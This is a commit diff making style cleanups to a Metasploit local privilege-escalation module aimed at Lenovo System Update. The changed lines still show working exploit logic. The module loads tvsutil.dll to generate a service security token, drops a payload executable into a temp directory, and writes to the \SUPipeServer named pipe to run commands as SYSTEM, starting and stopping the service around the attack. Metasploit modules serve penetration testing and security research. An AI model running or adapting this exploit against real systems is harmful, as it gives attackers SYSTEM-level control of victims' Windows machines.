Do minor code cleanup
parent
d99eedb1e4
commit
3aa1ffb4f5
|
@ -4,25 +4,24 @@
|
|||
##
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Services
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
'Name' => 'Lenovo System Update Privilege Escalation',
|
||||
'Description' => %q{
|
||||
The named pipe, \SUPipeServer, can be accessed by normal users to interact
|
||||
with the System update service. The service provides the possibility to execute
|
||||
arbitrary commands as SYSTEM if a valid security token is provided. This token can
|
||||
be generated by calling the GetSystemInfoData function in the DLL tvsutil.dll
|
||||
|
||||
Please note that the System Update is stopped by default but can be started/stopped calling
|
||||
the Executable ConfigService.exe
|
||||
The named pipe, \SUPipeServer, can be accessed by normal users to interact with the
|
||||
System update service. The service provides the possibility to execute arbitrary
|
||||
commands as SYSTEM if a valid security token is provided. This token can be generated
|
||||
by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the
|
||||
System Update is stopped by default but can be started/stopped calling the Executable
|
||||
ConfigService.exe.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -118,13 +117,14 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
|
||||
def get_security_token(lenovo_directory)
|
||||
if not client.railgun.get_dll('tvsutil') then
|
||||
unless client.railgun.get_dll('tvsutil')
|
||||
client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
|
||||
client.railgun.add_function("tvsutil", "GetSystemInfoData", "DWORD", [["PWCHAR","systeminfo","out"]], windows_name = nil, calling_conv = "cdecl")
|
||||
client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], windows_name = nil, calling_conv = 'cdecl')
|
||||
end
|
||||
|
||||
dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
|
||||
return dll_response['systeminfo'][0,40]
|
||||
|
||||
dll_response['systeminfo'][0,40]
|
||||
end
|
||||
|
||||
|
||||
|
@ -139,23 +139,23 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
su_directory = service_info('SUService')[:path][1..-16]
|
||||
print_status("Starting service via ConfigService.exe")
|
||||
config_service(su_directory, "start")
|
||||
print_status("Giving the service some time to start...")
|
||||
sleep(datastore['sleep'])
|
||||
print_status('Starting service via ConfigService.exe')
|
||||
config_service(su_directory, 'start')
|
||||
|
||||
print_status('Giving the service some time to start...')
|
||||
Rex.sleep(datastore['Sleep'])
|
||||
|
||||
print_status("Getting security token...")
|
||||
token = get_security_token(su_directory)
|
||||
vprint_good("Security token is: #{token}")
|
||||
|
||||
|
||||
if datastore['WritableDir'] and not datastore['WritableDir'].empty?
|
||||
temp_dir = datastore['WritableDir']
|
||||
else
|
||||
if datastore['WritableDir'].nil? || datastore['WritableDir'].empty?
|
||||
temp_dir = get_env('TEMP')
|
||||
else
|
||||
temp_dir = datastore['WritableDir']
|
||||
end
|
||||
|
||||
print_status("Using #{temp_dir} to drop malicious exe")
|
||||
print_status("Using #{temp_dir} to drop the payload")
|
||||
|
||||
begin
|
||||
cd(temp_dir)
|
||||
|
@ -186,8 +186,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
fail_with(Failure::Unknown, 'Failed to write to pipe')
|
||||
end
|
||||
|
||||
print_status("Stopping service via ConfigService.exe")
|
||||
config_service(su_directory, "stop")
|
||||
print_status('Stopping service via ConfigService.exe')
|
||||
config_service(su_directory, 'stop')
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue